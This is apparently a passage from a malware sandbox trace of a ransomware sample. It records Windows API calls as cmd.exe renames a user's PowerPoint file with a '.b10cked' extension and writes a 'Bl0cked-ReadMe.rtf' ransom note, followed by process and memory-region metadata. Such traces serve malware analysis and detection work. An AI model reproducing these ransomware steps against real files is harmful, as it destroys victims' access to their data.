_MaxCount=0x7) returned 3 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 
[0236.684] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0236.685] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0236.685] _wcsicmp (_String1="NGDM~1.PPT", _String2=".") returned 64 [0236.685] _wcsicmp (_String1="NGDM~1.PPT", _String2="..") returned 64 [0236.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm~1.ppt")) returned 0x20 [0236.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xe1d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.685] SetErrorMode (uMode=0x0) returned 0x0 [0236.685] SetErrorMode (uMode=0x1) returned 0x0 [0236.685] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", nBufferLength=0x104, lpBuffer=0x2cece4, lpFilePart=0x2ceccc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", lpFilePart=0x2ceccc*="NGDM~1.PPT") returned 0x24 [0236.685] SetErrorMode (uMode=0x0) returned 0x1 [0236.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0236.685] _wcsicmp (_String1="NGDM~1.PPT", _String2=".") returned 64 [0236.685] _wcsicmp (_String1="NGDM~1.PPT", _String2="..") returned 64 [0236.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm~1.ppt")) returned 0x20 [0236.685] SetErrorMode (uMode=0x0) returned 0x0 [0236.685] SetErrorMode (uMode=0x1) returned 0x0 [0236.685] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", nBufferLength=0x104, lpBuffer=0x2cf160, lpFilePart=0x2ceef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", lpFilePart=0x2ceef8*="NGDM~1.PPT") returned 0x24 [0236.686] SetErrorMode (uMode=0x0) returned 0x1 [0236.686] SetErrorMode (uMode=0x0) returned 0x0 [0236.686] SetErrorMode (uMode=0x1) returned 0x0 [0236.686] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x2cf368, lpFilePart=0x2ceef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked", lpFilePart=0x2ceef8*="Ngdm.pptx.b10cked") returned 0x2b [0236.686] SetErrorMode (uMode=0x0) returned 0x1 [0236.686] SetLastError (dwErrCode=0x0) [0236.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm.pptx.b10cked")) returned 0xffffffff [0236.686] GetLastError () returned 0x2 [0236.686] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x2ce874, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce874) returned 0xd0eb8 [0236.686] FindNextFileW (in: hFindFile=0xd0eb8, lpFindFileData=0x2ce874 | out: lpFindFileData=0x2ce874) returned 0 [0236.686] GetLastError () returned 0x12 [0236.686] FindClose (in: hFindFile=0xd0eb8 | out: hFindFile=0xd0eb8) returned 1 [0236.687] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", fInfoLevelId=0x1, lpFindFileData=0xe1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xe1ac8) returned 0xd0eb8 [0236.687] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x2ceb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked", lpFilePart=0x0) returned 0x2b [0236.687] GetFullPathNameW (in: 
lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx", nBufferLength=0x104, lpBuffer=0x2ceb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx", lpFilePart=0x0) returned 0x23 [0236.687] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm.pptx")) returned 0x20 [0236.687] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm.pptx.b10cked"), dwFlags=0x3) returned 1 [0236.688] FindClose (in: hFindFile=0xd0eb8 | out: hFindFile=0xd0eb8) returned 1 [0236.688] _vsnwprintf (in: _Buffer=0x4a855040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ceac0 | out: _Buffer=" 1") returned 9 [0236.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.688] GetFileType (hFile=0x7) returned 0x2 [0237.012] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0237.012] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cea4c | out: lpMode=0x2cea4c) returned 1 [0237.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.012] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cea80 | out: lpConsoleScreenBufferInfo=0x2cea80) returned 1 [0237.013] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a864640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0237.013] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a864640, nSize=0x2000, Arguments=0x2ceac0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0237.013] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a864640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ceaa4, lpReserved=0x0 | out: lpBuffer=0x4a864640*, lpNumberOfCharsWritten=0x2ceaa4*=0x1a) returned 1 [0237.013] _get_osfhandle 
(_FileHandle=1) returned 0x7 [0237.013] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.014] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0237.014] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.014] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0237.014] SetConsoleInputExeNameW () returned 0x1 [0237.014] GetConsoleOutputCP () returned 0x1b5 [0237.014] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.014] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.014] exit (_Code=0) Process: id = "651" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xc50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35792 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35793 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35794 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000040000" filename = "" Region: id = 35795 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35796 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35797 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35798 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35799 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35800 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 35801 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35826 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35827 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35828 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35829 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" 
filename = "" Region: id = 35830 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 35831 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35832 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35833 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35834 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35835 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35836 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35837 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35838 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 
35839 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35840 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35841 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35842 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35843 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 35844 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 35845 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35846 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35847 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 35848 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 35849 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 892 os_tid = 0x678 [0236.981] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa9c | out: lpSystemTimeAsFileTime=0x2efa9c*(dwLowDateTime=0xc0b6b0e0, 
dwHighDateTime=0x1d440a9)) [0236.981] GetCurrentProcessId () returned 0xc50 [0236.981] GetCurrentThreadId () returned 0x678 [0236.981] GetTickCount () returned 0x41035 [0236.981] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa94 | out: lpPerformanceCount=0x2efa94*=29377070463) returned 1 [0236.982] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000 [0236.982] __set_app_type (_Type=0x1) [0236.982] __p__fmode () returned 0x76b331f4 [0236.982] __p__commode () returned 0x76b331fc [0236.982] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0 [0236.982] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0 [0236.982] GetCurrentThreadId () returned 0x678 [0236.982] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x678) returned 0x38 [0236.982] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.983] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0236.983] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.983] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.983] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa2c | out: phkResult=0x2efa2c*=0x0) returned 0x2 [0236.983] VirtualQuery (in: lpAddress=0x2efa63, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.983] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 
0x1c [0236.983] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0236.983] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.983] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0236.983] GetConsoleOutputCP () returned 0x1b5 [0236.983] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0236.983] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1 [0236.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.983] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0236.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.984] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0236.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.984] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.984] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.984] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0236.984] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.984] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0236.984] GetEnvironmentStringsW () returned 0x3e0168* [0236.984] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0236.984] GetEnvironmentStringsW () returned 0x3e0168* [0236.985] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0236.985] RegOpenKeyExW (in: hKey=0x80000002, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee99c | out: phkResult=0x2ee99c*=0x40) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x90, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x1, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x1, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x0, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x40, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x40, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x40, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegCloseKey (hKey=0x40) returned 0x0 [0236.985] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, 
samDesired=0x2000000, phkResult=0x2ee99c | out: phkResult=0x2ee99c*=0x40) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x40, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x1, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x1, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x0, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x9, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x9, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x9, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegCloseKey (hKey=0x40) returned 0x0 [0236.985] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c4 [0236.985] srand (_Seed=0x5b8863c4) [0236.985] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0236.985] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" [0236.985] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a855260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.986] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0236.986] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.986] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.986] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a860640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.986] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0236.986] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0236.986] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0236.986] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0236.986] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 